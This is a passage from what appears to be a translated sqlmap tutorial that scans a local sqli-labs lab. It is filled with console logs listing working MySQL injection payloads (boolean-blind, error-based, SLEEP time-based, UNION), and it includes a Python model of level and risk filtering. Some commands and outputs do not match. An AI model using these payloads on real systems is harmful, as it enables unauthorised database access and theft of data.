[18:11:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:01] [WARNING] reflective value(s) found and filtering out
[18:11:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:11:01] [INFO] testing 'Generic inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:11:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:11:01] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:11:01] [INFO] testing 'MySQL inline queries'
[18:11:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:11:01] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:11:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:11:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:11:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:11:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:11:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:11:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:11:12] [INFO] target URL appears to have 3 columns in query
[18:11:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
---
[18:11:18] [INFO] the back-end DBMS is MySQL
[18:11:18] [INFO] fetching banner
[18:11:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:11:18] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 18:11:18 /2020-02-29/


If necessary, delete the cached session files in the output directory first and then test again; the difference will be more noticeable.

II. Customizing sqlmap's detection parameters

View the sqlmap help:

python sqlmap.py -hh

Part of the output:

Detection:                                                                
  These options can be used to customize the detection phase              
                                                                          
  --level=LEVEL       Level of tests to perform (1-5, default 1)          
  --risk=RISK         Risk of tests to perform (1-3, default 1)           
  --string=STRING     String to match when query is evaluated to True     
  --not-string=NOT..  String to match when query is evaluated to False    
  --regexp=REGEXP     Regexp to match when query is evaluated to True     
  --code=CODE         HTTP code to match when query is evaluated to True  
  --smart             Perform thorough tests only if positive heuristic(s)
  --text-only         Compare pages based only on the textual content     
  --titles            Compare pages based only on their titles            

It includes the two parameters --level and --risk.

1. Setting the sqlmap detection level

Parameter:
--level
This parameter sets the detection level; there are 5 levels, 1 to 5.
The default is 1, which performs the fewest tests; correspondingly, level 5 performs the most.
Level 1 tests GET and POST requests;
level 2 also tests cookies;
level 3 also tests User-Agent and Referer;
the higher the level, the more is tested.
For more detail, look at data\xml\payloads under the sqlmap directory (older sqlmap versions may lay the directory out differently, possibly xml\payloads); the contents look like this:

    <test>
        <title>AND boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>AND [INFERENCE]</vector>
        <request>
            <payload>AND [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>

    <test>
        <title>OR boolean-based blind - WHERE or HAVING clause</title>
        <stype>1</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>2</where>
        <vector>OR [INFERENCE]</vector>
        <request>
            <payload>OR [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>

    <test>
        <title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>OR NOT [INFERENCE]</vector>
        <request>
            <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>

Example test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner --level 2 -v 5

Output

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:29:07 /2020-02-29/

[18:29:07] [DEBUG] cleaning up configuration parameters
[18:29:07] [DEBUG] setting the HTTP timeout
[18:29:07] [DEBUG] setting the HTTP User-Agent header
[18:29:07] [DEBUG] creating HTTP requests opener object
[18:29:08] [INFO] resuming back-end DBMS 'mysql'
[18:29:08] [INFO] testing connection to the target URL
[18:29:08] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1--banner HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

[18:29:08] [DEBUG] declared web page charset 'utf-8'
[18:29:08] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 10:29:08 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1--banner
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL-- -
---
[18:29:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[18:29:08] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 18:29:08 /2020-02-29/


2. Setting the sqlmap risk level

Parameter:
--risk
This parameter sets the risk level; there are 3 levels, 1 to 3.
The default risk level is 1, which in most cases is harmless to the target under test;
risk level 2 adds time-based injection tests, and level 3 adds OR-based tests.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner --risk 2 -v 5

Output

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                 
|___|_  [.]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 18:33:59 /2020-02-29/                                                                                                                      
                                                                                                                                                          
[18:33:59] [DEBUG] cleaning up configuration parameters                                                                                                   
[18:34:00] [DEBUG] setting the HTTP timeout                                                                                                               
[18:34:00] [DEBUG] setting the HTTP User-Agent header                                                                                                     
[18:34:00] [DEBUG] creating HTTP requests opener object                                                                                                   
[18:34:00] [INFO] resuming back-end DBMS 'mysql'                                                                                                          
[18:34:00] [INFO] testing connection to the target URL                                                                                                    
[18:34:00] [TRAFFIC OUT] HTTP request [#1]:                                                                                                               
GET /sqli-labs/Less-1/?id=1 HTTP/1.1                                                                                                                      
Cache-control: no-cache                                                                                                                                   
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)                                                                                                       
Host: 127.0.0.1                                                                                                                                           
Accept: */*                                                                                                                                               
Accept-encoding: gzip,deflate                                                                                                                             
Connection: close                                                                                                                                         
                                                                                                                                                          
[18:34:00] [DEBUG] declared web page charset 'utf-8'                                                                                                      
[18:34:00] [TRAFFIC IN] HTTP response [#1] (200 OK):                                                                                                      
Date: Sat, 29 Feb 2020 10:34:00 GMT                                                                                                                       
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a                                                                                             
X-Powered-By: PHP/7.3.4                                                                                                                                   
Connection: close                                                                                                                                         
Transfer-Encoding: chunked                                                                                                                                
Content-Type: text/html; charset=UTF-8                                                                                                                    
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1                                                                                                           
sqlmap resumed the following injection point(s) from stored session:                                                                                      
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                               
    Payload: id=1' AND 7309=7309 AND 'GVyE'='GVyE                                                                                                         
    Vector: AND [INFERENCE]                                                                                                                               
                                                                                                                                                          
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: id=1' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x716b627671,(SELECT (ELT(5612=5612,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JtLU'='JtLU
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: id=1' AND (SELECT 9807 FROM (SELECT(SLEEP(5)))hQew) AND 'RiIn'='RiIn                                                                         
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])                                             
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: Generic UNION query (NULL) - 3 columns                                                                                                         
    Payload: id=-5240' UNION ALL SELECT NULL,CONCAT(0x716b627671,0x634b55616c6f7158454649744769636d6469434650587346464c714e63504972694e646d44696d76,0x71787a6271),NULL-- -
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL-- -                                                                                                       
---                                                                                                                                                       
[18:34:00] [INFO] the back-end DBMS is MySQL                                                                                                              
[18:34:00] [INFO] fetching banner                                                                                                                         
[18:34:00] [DEBUG] resuming configuration option 'string' ('Your')                                                                                        
[18:34:00] [DEBUG] resuming configuration option 'optimize' (True)                                                                                        
[18:34:00] [DEBUG] turning off switch '--null-connection' used indirectly by switch '-o'                                                                  
[18:34:00] [DEBUG] performed 0 queries in 0.00 seconds                                                                                                    
back-end DBMS: MySQL >= 5.0                                                                                                                               
banner: '5.7.26'                                                                                                                                          
[18:34:00] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 18:34:00 /2020-02-29/

Data in the database is modified only when the risk level is set to 3 and, at the same time, the injection point is in an UPDATE statement.

III. sqlmap injection at a specified position

1. Specifying which parameters sqlmap injects

By default sqlmap tests every GET and POST parameter; when the level is 2 or higher it also tests cookie parameters, and when the level is 3 or higher it also tests User-Agent and Referer.
You can also hand it a comma-separated list of parameters to test; the parameters in that list are not subject to the level restriction. That is what -p does.
To leave a particular parameter untested, use --skip.
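The level and risk filtering of payload entries described in sections 1 and 2, together with the -p/--skip parameter selection described here, modelled in Python as an added example (this is not sqlmap's own code). The payload sample is constructed in the title/level/risk layout of the entries quoted earlier, the parameter-place thresholds come from the text, and the rule that -p restricts testing to the listed names is taken from sqlmap's documented behaviour, not from this page.

```python
"""Model of how --level, --risk, -p and --skip narrow what sqlmap tests.

Added example, not sqlmap's own code. The payload sample below is
constructed here in the layout of the entries quoted above; the
parameter-place rules follow the text (GET/POST at level 1, Cookie at 2,
User-Agent/Referer at 3). Assumption: an entry is selected only when both
its level and its risk are within the values given on the command line.
"""
import xml.etree.ElementTree as ET

# Lowest --level at which each parameter place is looked at (from the text).
PLACE_MIN_LEVEL = {"GET": 1, "POST": 1, "Cookie": 2, "User-Agent": 3, "Referer": 3}


def build_sample_payloads() -> str:
    """Serialize three constructed entries (the ones quoted above) into the
    XML layout used by the files under data/xml/payloads."""
    entries = [
        # title, level, risk, payload template
        ("AND boolean-based blind - WHERE or HAVING clause", 1, 1,
         "AND [RANDNUM]=[RANDNUM]"),
        ("OR boolean-based blind - WHERE or HAVING clause", 1, 3,
         "OR [RANDNUM]=[RANDNUM]"),
        ("OR boolean-based blind - WHERE or HAVING clause (NOT)", 3, 3,
         "OR NOT [RANDNUM]=[RANDNUM]"),
    ]
    root = ET.Element("root")
    for title, level, risk, payload in entries:
        entry = ET.SubElement(root, "test")
        ET.SubElement(entry, "title").text = title
        ET.SubElement(entry, "level").text = str(level)
        ET.SubElement(entry, "risk").text = str(risk)
        request = ET.SubElement(entry, "request")
        ET.SubElement(request, "payload").text = payload
    return ET.tostring(root, encoding="unicode")


def selected_tests(payload_xml: str, level: int, risk: int) -> list:
    """Return the titles of the entries that survive --level/--risk filtering.

    An entry is skipped when its own level exceeds --level or its own risk
    exceeds --risk: level=1 risk=1 keeps only the AND test, risk=3 additionally
    enables the OR test, and the NOT variant needs level>=3 as well.
    """
    if not 1 <= level <= 5 or not 1 <= risk <= 3:
        raise ValueError("level must be 1-5 and risk 1-3")
    root = ET.fromstring(payload_xml)
    chosen = []
    for entry in root.iter("test"):
        entry_level = int(entry.findtext("level"))
        entry_risk = int(entry.findtext("risk"))
        if entry_level <= level and entry_risk <= risk:
            chosen.append(entry.findtext("title"))
    return chosen


def selected_parameters(params, level, test_params=None, skip=None):
    """Decide which request parameters are tested at a given --level.

    params: list of (place, name) pairs found in the request, e.g. ("GET", "id").
    test_params: names given with -p; when present, only these are tested and
                 the level threshold is bypassed for them.
    skip: names given with --skip; these are never tested.
    """
    forced = set(test_params or [])
    skipped = set(skip or [])
    chosen = []
    for place, name in params:
        if name in skipped:
            continue
        if forced:
            if name in forced:
                chosen.append((place, name))
        elif PLACE_MIN_LEVEL.get(place, 99) <= level:
            chosen.append((place, name))
    return chosen


if __name__ == "__main__":
    xml_text = build_sample_payloads()
    for lvl, rsk in [(1, 1), (1, 3), (3, 3)]:
        print(f"--level {lvl} --risk {rsk}: {selected_tests(xml_text, lvl, rsk)}")
    # Constructed request: one GET parameter, one cookie, one header.
    request = [("GET", "id"), ("Cookie", "PHPSESSID"), ("User-Agent", "User-Agent")]
    for lvl in (1, 2, 3):
        print(f"--level {lvl}: {selected_parameters(request, lvl)}")
    print("-p id,User-Agent:", selected_parameters(request, 1, test_params=["id", "User-Agent"]))
    print("--skip id:", selected_parameters(request, 3, skip=["id"]))
```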

Testing the -p parameter:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,user-agent" --banner

Output

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:46:17 /2020-02-29/

[19:46:17] [INFO] testing connection to the target URL
[19:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:46:17] [INFO] testing if the target URL content is stable
[19:46:17] [INFO] target URL content is stable
[19:46:18] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:46:18] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:46:18] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[19:46:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:46:20] [WARNING] reflective value(s) found and filtering out
[19:46:20] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:46:20] [INFO] testing 'Generic inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:46:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:46:20] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:46:20] [INFO] testing 'MySQL inline queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:46:20] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:46:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:46:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:46:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:46:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:46:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:46:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:46:31] [INFO] target URL appears to have 3 columns in query
[19:46:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3986=3986 AND 'enRu'='enRu

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(1856=1856,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lead'='lead

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1215 FROM (SELECT(SLEEP(5)))pAXX) AND 'hFkU'='hFkU

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-7916' UNION ALL SELECT NULL,CONCAT(0x716a6b7871,0x5555746d5964564d754675746c4543626c4f556c4f79716874665470654872514878594c714b4b42,0x7176627171),NULL-- -
---
[19:46:36] [INFO] the back-end DBMS is MySQL
[19:46:36] [INFO] fetching banner
[19:46:37] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[19:46:37] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 19:46:37 /2020-02-29/


Add more parameters and test again:

python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-1/?id=1&us=1&uname=admin" -p "id,uname" --banner

Output:

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:07:41 /2020-02-29/

[20:07:42] [INFO] testing connection to the target URL
[20:07:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:07:42] [INFO] testing if the target URL content is stable
[20:07:42] [INFO] target URL content is stable
[20:07:42] [INFO] testing if GET parameter 'id' is dynamic
[20:07:42] [INFO] GET parameter 'id' appears to be dynamic
[20:07:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:07:42] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:07:42] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:07:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:45] [WARNING] reflective value(s) found and filtering out
[20:07:45] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:07:45] [INFO] testing 'Generic inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:07:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:07:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:07:45] [INFO] testing 'MySQL inline queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:07:45] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:07:45] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:07:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:07:55] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:07:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:07:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:07:55] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:07:55] [INFO] target URL appears to have 3 columns in query
[20:07:56] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2973=2973 AND 'kWQV'='kWQV

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4270 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(4270=4270,1))),0x716a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rvTB'='rvTB

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9758 FROM (SELECT(SLEEP(5)))Vtem) AND 'vzvR'='vzvR

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4491' UNION ALL SELECT NULL,NULL,CONCAT(0x716a766271,0x7353566b685a767a4a68677574726d7662637477586e445172546473554f5872507a616670787677,0x716a6a6b71)-- -
---
[20:08:00] [INFO] the back-end DBMS is MySQL
[20:08:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:08:00] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:08:00 /2020-02-29/

'us' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
uname: unknown option -- banner
Try 'uname --help' for more information.

--skip parameter test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,uname" --flush-session --banner

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
